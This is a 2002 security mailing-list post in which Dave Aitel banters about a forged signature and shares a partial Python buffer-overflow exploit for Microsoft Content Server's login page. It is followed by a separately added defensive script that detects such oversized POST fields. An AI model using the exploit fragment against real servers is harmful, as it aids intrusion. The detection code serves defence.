Open Source and information security mailing list archives
Message-ID: <1029359172.19064.67.camel@localhost.localdomain>
From: dave at immunitysec.com (Dave Aitel)
Subject: ALERT! ALERT! Confessions of a turkey ALERT! ALERT!

;p;p;p;p;p;p;p

At least you got the key id correct that time. It's not a valid
signature, but at least it produces one less error message.

-dave

ObExploit:

#fragment of my exploit for MS Content Server
#the full exploit can be found at https://immunitysec.com/members/
#but if you're not a member, this might save you some time writing your
#exploit.

import sys
import urllib

#returns the sploitstring (method of the mscsexploit class used below;
#stroverwrite and unicodeloop are defined elsewhere in the full exploit)
def makesploit(self):
    header=""
    body=""
    body+="NR_DOMAIN=WinNT%3A%2F%2F"
    #1 alignment byte so we are word aligned with the return addr
    attack=""
    attack+="A"
    attack+="\x41\xb9"*4000
    #unicode shellcode!!
    attack=stroverwrite(attack,unicodeloop,1)
    print "length of overflow = "+str(len(attack))
    attack=urllib.quote(attack)
    #print attack
    body+=attack
    body+="&NR_DOMAIN_LIST=WinNT%3A%2F%2FOAG4ZA0SR80BCRG&NR_USER=&NR_PASSWORD=&submit1=Continue&NEXTURL=%2FNR%2FSystem%2FAccess%2FDefaultGuestLogin.asp"
    header+="POST /NR/System/Access/ManualLoginSubmit.asp HTTP/1.1\r\n"
    header+="Host: "+self.host+"\r\n"
    header+="User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; Bob)\r\n"
    header+="Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1\r\n"
    header+="Connection: keep-alive\r\n"
    header+="Content-Type: application/x-www-form-urlencoded\r\n"
    header+="Content-Length: "+str(len(body))+"\r\n"
    header+="\r\n"
    return header+body

#this stuff happens.
if __name__ == '__main__':
    print "Running Microsoft Content Server exploit v 0.1"
    app = mscsexploit()
    if len(sys.argv) < 2:
        print "Usage: mycontent.py target [port] [ssl=0]"
        sys.exit()
    app.setHost(sys.argv[1])
    if len(sys.argv) > 2:
        app.setPort(int(sys.argv[2]))
    if len(sys.argv) > 3:
        app.setSSL(1)
    app.run()

On Wed, 2002-08-14 at 17:00, gobbles@...h.com wrote:
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
> 
> or if you like
> 
> On 14 Aug 2002 16:36:09 -0400, Dave Aitel <dave@...unitysec.com> wrote:
> >On Wed, 2002-08-14 at 17:04, Charles Stevenson wrote:
> >> Gobbles,
> >> 
> >> On Wed, Aug 14, 2002 at 12:33:27PM -0700, gobbles@...h.com wrote:
> >> > GOBBLES just want to be cool whitehat like everyone else. Time for new
> >> > leaf time for six figure salary stock option naked breasted assistant.
> >> 
> >> Word to that my man! ;)
> >> 
> >> peace,
> >> core
> >
> >Your message was signed, but the "GOBBLES" message was not and therefore
> >just a forgery, most likely.
> >
> >BTW:
> >http://www.immunitysec.com/vulnerabilities/
> >They aren't advisories, but if you need something to show to your boss
> >about why you disconnected your Exchange/SQL server from the Internet,
> >it's a good start.
> >
> >Dave Aitel
> >Immunity, Inc
> >
> >
> 
> -----BEGIN PGP SIGNATURE-----
> Version: Hush 2.1
> Note: This signature can be verified at https://www.hushtools.com
> 
> wlwEARECABwFAj1H8s4VHGdvYmJsZXNAaHVzaG1haWwuY29tAAoJEBzRp5chmbAPl8QA
> nA66Z1OWuMnTnOhLlFQLa0nOHSZtAJsFKJo5AOe/7/OYbXpZRd3grAD8MQ==
> =xfu0
> -----END PGP SIGNATURE-----
> 
> 
> Communicate in total privacy.
> Get your free encrypted email at https://www.hushmail.com/?l=2
> 
> Looking for a good deal on a domain name? http://www.hush.com/partners/offers.cgi?id=domainpeople
> 
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 232 bytes
Desc: This is a digitally signed message part
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20020814/6e0905ae/attachment.bin
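The fragment above builds a POST to /NR/System/Access/ManualLoginSubmit.asp whose NR_DOMAIN field is thousands of bytes of a repeated two-byte unit rather than a domain name. The following is an added example, not code from Dave Aitel's post or from Immunity's exploit, written from the defender's side: a request inspector that percent-decodes the form body byte-for-byte (so high bytes such as 0xB9 survive), then flags any login field over a size threshold, any long run of a repeating 1- or 2-byte unit, and a Content-Length that disagrees with the body. The login path is the one in the post; the thresholds, the host name and the two sample requests are constructed for this example.

```python
# Added example (not code from the post or from Immunity): a defensive
# inspector for POSTs to the MS Content Server login form shown above.
import re
from urllib.parse import unquote_to_bytes

LOGIN_PATH = "/NR/System/Access/ManualLoginSubmit.asp"  # path from the post
MAX_FIELD_LEN = 256   # assumption: no legitimate NR_* login field is longer
MIN_REPEAT_RUN = 64   # assumption: >=64 bytes of one repeating unit is filler

# Group 1: one byte repeated MIN_REPEAT_RUN times; group 2: a two-byte unit
# repeated MIN_REPEAT_RUN/2 times. DOTALL so '.' also matches 0x0A.
_REPEAT = re.compile(
    rb"(.)\1{%d,}|(..)\2{%d,}" % (MIN_REPEAT_RUN - 1, MIN_REPEAT_RUN // 2 - 1),
    re.DOTALL,
)


def parse_request(raw: bytes):
    """Split a raw HTTP request into (method, path, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, path, _version = lines[0].split(b" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode("ascii")] = value.strip().decode("latin-1")
    return method.decode("ascii"), path.decode("ascii"), headers, body


def parse_form(body: bytes) -> dict:
    """Percent-decode application/x-www-form-urlencoded into {name: raw bytes}.
    Done by hand rather than with parse_qs so non-UTF-8 bytes are kept intact."""
    fields = {}
    for pair in body.split(b"&"):
        if not pair:
            continue
        name, _, value = pair.partition(b"=")
        fields[unquote_to_bytes(name).decode("latin-1")] = unquote_to_bytes(value)
    return fields


def inspect_login_post(raw: bytes) -> list:
    """Return a list of finding strings; an empty list means nothing was flagged."""
    method, path, headers, body = parse_request(raw)
    if method != "POST" or path != LOGIN_PATH:
        return []
    findings = []
    declared = headers.get("content-length")
    if declared is not None and int(declared) != len(body):
        findings.append("content-length %s != body length %d" % (declared, len(body)))
    for name, value in parse_form(body).items():
        if len(value) > MAX_FIELD_LEN:
            findings.append("oversized field %s (%d bytes)" % (name, len(value)))
        m = _REPEAT.search(value)
        if m:
            findings.append("repeated-unit run of %d bytes in %s" % (len(m.group(0)), name))
    return findings


def build_post(body: bytes, host: str = "cms.example.test") -> bytes:
    """Constructed helper: wrap a form body in a minimal, well-formed POST."""
    head = [
        b"POST " + LOGIN_PATH.encode("ascii") + b" HTTP/1.1",
        b"Host: " + host.encode("ascii"),
        b"Content-Type: application/x-www-form-urlencoded",
        b"Content-Length: " + str(len(body)).encode("ascii"),
    ]
    return b"\r\n".join(head) + b"\r\n\r\n" + body


# Constructed sample 1: an ordinary login attempt.
BENIGN = build_post(
    b"NR_DOMAIN=WinNT%3A%2F%2FOAG4ZA0SR80BCRG&NR_USER=alice&NR_PASSWORD=x&submit1=Continue"
)

# Constructed sample 2: the shape of the request the fragment builds, i.e. the
# same two-byte filler after the alignment byte, with no shellcode.
SUSPECT = build_post(
    b"NR_DOMAIN=WinNT%3A%2F%2FA" + b"A%B9" * 4000
    + b"&NR_USER=&NR_PASSWORD=&submit1=Continue"
)

if __name__ == "__main__":
    for label, req in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(label, inspect_login_post(req) or "clean")
```

The benign request yields no findings; the suspect one is flagged twice on NR_DOMAIN, once for size (8009 decoded bytes) and once for the 8000-byte run of a repeating unit. The run check is what distinguishes sled-like filler from a merely long but plausible value, and the Content-Length comparison catches bodies that have been truncated or padded in transit.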